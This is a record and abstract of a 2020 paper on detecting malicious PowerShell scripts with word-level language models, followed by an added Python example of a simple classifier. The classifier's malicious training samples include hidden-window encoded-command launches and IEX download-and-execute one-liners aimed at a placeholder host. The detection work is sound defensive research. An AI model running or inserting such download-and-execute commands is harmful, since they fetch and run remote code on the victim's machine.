Detection of Malicious PowerShell Using Word-Level Language Models
2020; Springer Science+Business Media; Language: English
10.1007/978-3-030-58208-1_3
ISSN 1611-3349
Topic(s): Spam and Phishing Detection
Abstract
There is a growing tendency for cybercriminals to abuse legitimate tools already installed on target computers for cyberattacks. In particular, the abuse of PowerShell, provided by Microsoft, has been increasing every year and has become a threat. In previous studies, a method to detect malicious PowerShell commands using character-level deep learning was proposed. That method combines traditional natural language processing with character-level convolutional neural networks; however, it requires time for dynamic analysis. This paper proposes a method to classify unknown PowerShell scripts without dynamic analysis. Our method classifies scripts using feature vectors extracted from malicious and benign PowerShell scripts with word-level language models. The datasets were generated from benign and malicious PowerShell scripts obtained from Hybrid Analysis and benign PowerShell scripts obtained from GitHub, and are imbalanced. The experimental results show that the combination of LSI and XGBoost produces the highest detection rate. The maximum accuracy is approximately 0.95 on the imbalanced dataset. Furthermore, over 50% of unknown malicious PowerShell scripts could be detected in a time-series analysis without dynamic analysis.
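To illustrate the word-level feature extraction the abstract describes, here is an added, simplified example that is not the paper's code: it tokenizes PowerShell at word level (cmdlets, variables, parameters), builds term-frequency vectors, and classifies a new script by cosine similarity to per-class centroids. The paper's LSI + XGBoost pipeline is replaced by this nearest-centroid classifier purely to keep the example self-contained; the sample scripts are constructed, with placeholder hostnames.

```python
import math
import re
from collections import Counter

# Word-level tokenizer for PowerShell: keeps variables ($x), parameters (-Param),
# cmdlets (Verb-Noun) and bare words. Lower-cased because PowerShell is case-insensitive.
TOKEN_RE = re.compile(r"\$[A-Za-z_][\w:]*|-?[A-Za-z_][\w\-]*")

def tokenize(script):
    return [t.lower() for t in TOKEN_RE.findall(script)]

def bow(tokens):
    """Raw term-frequency vector (one row of a term-document matrix) as a Counter."""
    return Counter(tokens)

def cosine(a, b):
    dot = sum(a[k] * b.get(k, 0) for k in a)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

def centroid(vectors):
    """Mean term-frequency vector of a class (stand-in for the paper's LSI + XGBoost)."""
    total = Counter()
    for v in vectors:
        total.update(v)
    return {k: c / len(vectors) for k, c in total.items()}

# Constructed training samples, NOT from the paper's Hybrid Analysis / GitHub datasets.
BENIGN = [
    "Get-ChildItem -Path C:\\Logs -Recurse | Where-Object { $_.Length -gt 1MB }",
    "$svc = Get-Service -Name Spooler; Restart-Service -InputObject $svc",
    "Import-Module ActiveDirectory; Get-ADUser -Filter * | Export-Csv users.csv",
]
MALICIOUS = [
    "powershell -nop -w hidden -EncodedCommand PLACEHOLDER_BASE64",
    "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://EXAMPLE-PLACEHOLDER/p')",
    "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://EXAMPLE-PLACEHOLDER/x') -NoProfile -WindowStyle Hidden",
]

def train(benign, malicious):
    return {"benign": centroid([bow(tokenize(s)) for s in benign]),
            "malicious": centroid([bow(tokenize(s)) for s in malicious])}

def classify(model, script):
    v = bow(tokenize(script))
    return max(model, key=lambda label: cosine(v, model[label]))

MODEL = train(BENIGN, MALICIOUS)

if __name__ == "__main__":
    print(classify(MODEL, "Get-Service -Name WinRM | Restart-Service"))
```

With a real corpus the centroid step would be replaced by dimensionality reduction and a trained classifier; the tokenizer and term-frequency vectors are the part that carries over.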